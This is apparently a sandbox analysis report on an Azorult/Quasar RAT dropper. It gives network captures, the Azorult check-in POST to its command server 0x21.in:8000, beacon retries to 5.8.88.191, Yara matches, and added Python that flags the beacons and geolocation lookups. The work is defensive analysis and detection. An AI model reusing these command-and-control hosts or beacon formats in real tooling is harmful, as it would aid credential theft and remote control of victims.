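Sep 29, 2021 01:36:53.770750046 CEST 49750 8080 192.168.2.4 5.8.88.191
Sep 29, 2021 01:37:10.835088968 CEST 49751 8080 192.168.2.4 5.8.88.191
Sep 29, 2021 01:37:13.897594929 CEST 49751 8080 192.168.2.4 5.8.88.191
Sep 29, 2021 01:37:19.898145914 CEST 49751 8080 192.168.2.4 5.8.88.191
"""

ROW = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d)\.(\d+) \w+ (\d+) (\d+) (\S+) (\S+)$")


def parse_rows(text: str):
    """Yield (timestamp, src_port, dst_port, src_ip, dst_ip) for each table row."""
    for line in text.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            raise ValueError(f"unparsable row: {line!r}")
        base, frac, sport, dport, sip, dip = m.groups()
        # datetime only takes microseconds; the report prints nanoseconds, so truncate.
        ts = datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
        yield ts, int(sport), int(dport), sip, dip


def flows(text: str) -> dict:
    """Group packets into flows keyed by (client_port, server_ip, server_port)."""
    result = defaultdict(lambda: {"out": 0, "in": 0, "times": []})
    for ts, sport, dport, sip, dip in parse_rows(text):
        if sip == CLIENT:
            key, direction = (sport, dip, dport), "out"
        else:
            key, direction = (dport, sip, sport), "in"
        result[key][direction] += 1
        result[key]["times"].append(ts)
    return dict(result)


def unanswered(text: str) -> list:
    """Flows with client packets but no reply at all, oldest first:
    (server_ip, server_port, client_port, packets sent, seconds spent retrying)."""
    rows = []
    for (cport, sip, sport), f in flows(text).items():
        if f["in"] == 0:
            first, last = min(f["times"]), max(f["times"])
            rows.append((first, (sip, sport, cport, f["out"], round((last - first).total_seconds(), 2))))
    return [r for _, r in sorted(rows)]


def attempt_gaps(text: str, server_ip: str, server_port: int) -> list:
    """Seconds between the starts of successive connection attempts to one endpoint (beacon spacing)."""
    starts = sorted(min(f["times"]) for (_, ip, port), f in flows(text).items()
                    if ip == server_ip and port == server_port)
    return [round((b - a).total_seconds(), 2) for a, b in zip(starts, starts[1:])]


if __name__ == "__main__":
    for row in unanswered(TCP_ROWS):
        print(row)
    print(attempt_gaps(TCP_ROWS, "5.8.88.191", 8080))
```

Feeding the whole table instead of the subset adds ports 49752 to 49754 to the unanswered list with the same 3/6-second retries and the same roughly 26-second spacing, which is the kind of fixed-interval reconnect loop worth a network detection on its own even when the payload is never seen.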

                                        UDP Packets

Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Sep 29, 2021 01:35:49.361951113 CEST  54531        53         192.168.2.4  8.8.8.8
Sep 29, 2021 01:35:49.380501032 CEST  53           54531      8.8.8.8      192.168.2.4
Sep 29, 2021 01:35:55.125516891 CEST  58028        53         192.168.2.4  8.8.8.8
Sep 29, 2021 01:35:55.143276930 CEST  53           58028      8.8.8.8      192.168.2.4
Sep 29, 2021 01:35:55.282685995 CEST  53097        53         192.168.2.4  8.8.8.8
Sep 29, 2021 01:35:55.311024904 CEST  53           53097      8.8.8.8      192.168.2.4
Sep 29, 2021 01:36:07.160135031 CEST  49257        53         192.168.2.4  8.8.8.8
Sep 29, 2021 01:36:07.359210014 CEST  53           49257      8.8.8.8      192.168.2.4
Sep 29, 2021 01:36:09.943180084 CEST  62389        53         192.168.2.4  8.8.8.8
Sep 29, 2021 01:36:09.955970049 CEST  53           62389      8.8.8.8      192.168.2.4
Sep 29, 2021 01:36:19.977479935 CEST  49910        53         192.168.2.4  8.8.8.8
Sep 29, 2021 01:36:19.990183115 CEST  53           49910      8.8.8.8      192.168.2.4
Sep 29, 2021 01:36:40.032248020 CEST  55854        53         192.168.2.4  8.8.8.8
Sep 29, 2021 01:36:40.061148882 CEST  53           55854      8.8.8.8      192.168.2.4

                                        DNS Queries

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name        Type            Class
Sep 29, 2021 01:36:07.160135031 CEST  192.168.2.4  8.8.8.8  0x4ffa    Standard query (0)  0x21.in     A (IP address)  IN (0x0001)
Sep 29, 2021 01:36:09.943180084 CEST  192.168.2.4  8.8.8.8  0xdbd4    Standard query (0)  ip-api.com  A (IP address)  IN (0x0001)
Sep 29, 2021 01:36:19.977479935 CEST  192.168.2.4  8.8.8.8  0x2afc    Standard query (0)  ip-api.com  A (IP address)  IN (0x0001)

                                        DNS Answers

Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name        CName  Address       Type            Class
Sep 29, 2021 01:36:07.359210014 CEST  8.8.8.8    192.168.2.4  0x4ffa    No error (0)  0x21.in     -      50.17.5.224   A (IP address)  IN (0x0001)
Sep 29, 2021 01:36:09.955970049 CEST  8.8.8.8    192.168.2.4  0xdbd4    No error (0)  ip-api.com  -      208.95.112.1  A (IP address)  IN (0x0001)
Sep 29, 2021 01:36:19.990183115 CEST  8.8.8.8    192.168.2.4  0x2afc    No error (0)  ip-api.com  -      208.95.112.1  A (IP address)  IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • 0x21.in:8000
                                        • ip-api.com

                                        HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.4  49743        50.17.5.224     8000              C:\Users\user\Desktop\CVbJSUXraQ.exe

Timestamp                             kBytes transferred  Direction  Data
Sep 29, 2021 01:36:07.988516092 CEST  942                 OUT        POST /_az/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 0x21.in:8000
Content-Length: 101
Cache-Control: no-cache
Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32
Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.4  49744        208.95.112.1    80                C:\Users\user\AppData\Local\Temp\windef.exe

Timestamp                             kBytes transferred  Direction  Data
Sep 29, 2021 01:36:10.011471987 CEST  942                 OUT        GET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
Sep 29, 2021 01:36:10.037458897 CEST  943                 IN         HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 23:36:09 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 278
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 30 30 35 22 2c 22 6c 61 74 22 3a 34 37 2e 33 38 37 38 2c 22 6c 6f 6e 22 3a 38 2e 35 32 30 32 39 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 6f 72 67 22 3a 22 73 65 72 76 65 72 50 6f 6f 6c 32 22 2c 22 61 73 22 3a 22 41 53 35 31 33 39 35 20 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 71 75 65 72 79 22 3a 22 31 38 35 2e 33 32 2e 32 32 32 2e 31 35 22 7d
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8005","lat":47.3878,"lon":8.52029,"timezone":"Europe/Zurich","isp":"Datasource AG","org":"serverPool2","as":"AS51395 Datasource AG","query":"185.32.222.15"}


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.4  49746        208.95.112.1    80                C:\Users\user\AppData\Local\Temp\windef.exe

Timestamp                             kBytes transferred  Direction  Data
Sep 29, 2021 01:36:20.062109947 CEST  944                 OUT        GET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
Sep 29, 2021 01:36:20.087898016 CEST  944                 IN         HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 23:36:20 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 278
Access-Control-Allow-Origin: *
X-Ttl: 49
X-Rl: 42
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 30 30 35 22 2c 22 6c 61 74 22 3a 34 37 2e 33 38 37 38 2c 22 6c 6f 6e 22 3a 38 2e 35 32 30 32 39 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 6f 72 67 22 3a 22 73 65 72 76 65 72 50 6f 6f 6c 32 22 2c 22 61 73 22 3a 22 41 53 35 31 33 39 35 20 44 61 74 61 73 6f 75 72 63 65 20 41 47 22 2c 22 71 75 65 72 79 22 3a 22 31 38 35 2e 33 32 2e 32 32 32 2e 31 35 22 7d
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8005","lat":47.3878,"lon":8.52029,"timezone":"Europe/Zurich","isp":"Datasource AG","org":"serverPool2","as":"AS51395 Datasource AG","query":"185.32.222.15"}
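The three HTTP sessions above carry two distinct behaviours: the dropper's POST of a 101-byte opaque body to 0x21.in on port 8000 with an MSIE 6.0b User-Agent (the Azorult check-in, per the report's Yara matches), and windef.exe querying ip-api.com/json/ while claiming to be Firefox 48. The Python below is an added example, not part of the Joe Sandbox report, that parses requests in the form shown above and names the heuristics each one trips. The two requests are copied from the sessions above; the benign request, the extra IP-lookup hosts and the browser image names are assumptions for the sake of the example. The last two rules need the originating process, which a sandbox or endpoint sensor supplies and a plain packet capture does not.

```python
from dataclasses import dataclass

# User-Agent string carried by the Azorult beacon in session 0 above.
AZORULT_UA = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"
# Public IP-geolocation hosts: ip-api.com is the one in the capture, the others are assumed additions.
IP_LOOKUP_HOSTS = {"ip-api.com", "api.ipify.org", "icanhazip.com"}
# Image names whose User-Agent may legitimately claim to be a browser (assumed list).
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}

# Requests copied from the HTTP sessions above, plus one constructed benign request.
AZORULT_BEACON = """POST /_az/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: 0x21.in:8000
Content-Length: 101
Cache-Control: no-cache
"""
GEO_LOOKUP = """GET /json/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
Host: ip-api.com
Connection: Keep-Alive
"""
BENIGN = """GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:92.0) Gecko/20100101 Firefox/92.0
Host: example.com
"""


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict  # header names lower-cased


def parse_request(raw: str) -> HttpRequest:
    """Split a captured request (request line plus headers) into its parts."""
    lines = [l for l in raw.strip().splitlines() if l.strip()]
    method, path, _version = lines[0].split(None, 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method.upper(), path, headers)


def classify(raw: str, process: str) -> list:
    """Names of the heuristics the request trips, always in the same order."""
    req = parse_request(raw)
    ua = req.headers.get("user-agent", "")
    host, _, port = req.headers.get("host", "").partition(":")
    exe = process.rsplit("\\", 1)[-1].lower()
    hits = []
    # 1. Exact match on the beacon's hard-coded User-Agent: cheap, precise, but trivially changed.
    if ua == AZORULT_UA:
        hits.append("azorult_user_agent")
    # 2. The check-in shape: a POST with a raw body, no Content-Type, to an explicit non-web port.
    if req.method == "POST" and "content-type" not in req.headers and port not in ("", "80", "443"):
        hits.append("typeless_post_nonstandard_port")
    # 3. Victim geolocation: an IP-lookup service queried by something that is not a browser.
    if host.lower() in IP_LOOKUP_HOSTS and exe not in BROWSERS:
        hits.append("external_ip_lookup_nonbrowser")
    # 4. A browser User-Agent sent by a non-browser image (windef.exe, or the dropper itself).
    if any(tag in ua for tag in ("Firefox/", "Chrome/", "MSIE")) and exe not in BROWSERS:
        hits.append("browser_ua_from_nonbrowser")
    return hits


if __name__ == "__main__":
    print(classify(AZORULT_BEACON, r"C:\Users\user\Desktop\CVbJSUXraQ.exe"))
    print(classify(GEO_LOOKUP, r"C:\Users\user\AppData\Local\Temp\windef.exe"))
```

Rule 1 is an indicator that a rebuild of the malware invalidates; rules 2 to 4 describe behaviour and keep working across samples, which is why the process attribution a sandbox report gives you is worth carrying into the detection.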


                                        Code Manipulations

                                        Statistics

                                        Behavior


                                        System Behavior

                                        General

                                        Start time:01:35:55
                                        Start date:29/09/2021
                                        Path:C:\Users\user\Desktop\CVbJSUXraQ.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\CVbJSUXraQ.exe'
                                        Imagebase:0xdb0000
                                        File size:2111264 bytes
                                        MD5 hash:B0B78DA613422BE0DE8DE2E2A2D0CE68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Azorult_1, Description: Azorult Payload, Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Start time:01:36:03
                                        Start date:29/09/2021
                                        Path:C:\Users\user\AppData\Local\Temp\vnc.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\vnc.exe'
                                        Imagebase:0xab0000
                                        File size:415232 bytes
                                        MD5 hash:B8BA87EE4C3FC085A2FED0D839AADCE1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: crime_win32_hvnc_banker_gen, Description: Detects malware banker hidden VNC, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security
                                        • Rule: crime_win32_hvnc_zloader1_hvnc_generic, Description: Detects Zloader hidden VNC, Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel
                                        • Rule: crime_win32_hvnc_banker_gen, Description: Detects malware banker hidden VNC, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: Joe Security
                                        • Rule: crime_win32_hvnc_zloader1_hvnc_generic, Description: Detects Zloader hidden VNC, Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, Author: @VK_Intel
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 84%, Virustotal
                                        • Detection: 93%, ReversingLabs
                                        Reputation:moderate

                                        General

                                        Start time:01:36:04
                                        Start date:29/09/2021
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\svchost.exe -k
                                        Imagebase:0x7ff6eb840000
                                        File size:51288 bytes
                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_ramnitvncmodule, Description: Yara detected Ramnit VNC Module, Source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:01:36:04
                                        Start date:29/09/2021
                                        Path:C:\Users\user\AppData\Local\Temp\windef.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Local\Temp\windef.exe'
                                        Imagebase:0xf10000
                                        File size:357376 bytes
                                        MD5 hash:B4A202E03D4135484D0E730173ABCC72
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, Author: Joe Security
                                        • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, Author: Florian Roth
                                        • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, Author: Joe Security
